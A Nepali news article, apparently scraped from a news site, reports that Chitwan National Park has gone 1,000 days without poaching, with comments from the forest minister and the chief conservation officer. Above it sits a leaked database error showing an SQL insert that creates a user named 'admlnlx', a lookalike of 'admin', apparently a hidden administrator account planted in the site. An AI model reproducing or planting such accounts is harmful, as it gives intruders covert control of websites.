WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1uPKIEm71H0TnTS4h72Ns/G/GxQ4x0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:29:16', '', 'admlnlx', 'admlnlx')
चितवन, माघ १६–
चितवन राष्ट्रिय निकुञ्जमा शून्य चोरी शिकारी भएको एक हजार दिन पुगेको छ ।
निकुञ्जमा एक सिंगे गैंडालगायतका दुर्लभ वन्यजन्तु चोरी शिकारीबाट मृत्यु नभएपछि शुक्रबार एक हजार दिन पुगेको हो । अब ९५ दिन पछि चितवन राष्ट्रिय निकुञ्जले लगातार तीन वर्ष शून्य चोरी शिकारी वर्ष मनाउने छ ।
सौराहाको ड्याम साईडमा राखिएको शून्य चोरी शिकारी वर्षको एक हजार दिन लेखिएको बोर्डको शुक्रबार वन मन्त्री शंकर भण्डारीले अनावरण समेत गर्नुभयो । उहाँले लगातार शून्य चोरी शिकारी वर्ष मनाउन पाउनु सबैका लागि गौरवको विषय रहेको बताउनुभयो ।
निकुञ्जको तथ्याङ्कअनुसार चोरी सिकारबाट सबैभन्दा बढी आर्थिक वर्ष २०५८/५९ मा ३७ वटा र आर्थिक वर्ष २०५९/६० मा ३२ वटा गैँडा मारिएका थिए ।
चितवन राष्ट्रिय निकुञ्जका प्रमुख संरक्षण अधिकृत रामचन्द्र कँडेलले शून्य चोरी शिकार वर्ष एक हजार दिन पुग्नु महत्वपूर्ण उपलब्धरी रहेको बताउनुभयो । उहाँले शून्य चोरी शिकारलाई निरन्तरता दिन निकुञ्जले कुनै कसर बाँकी नराख्ने बताउनुभयो ।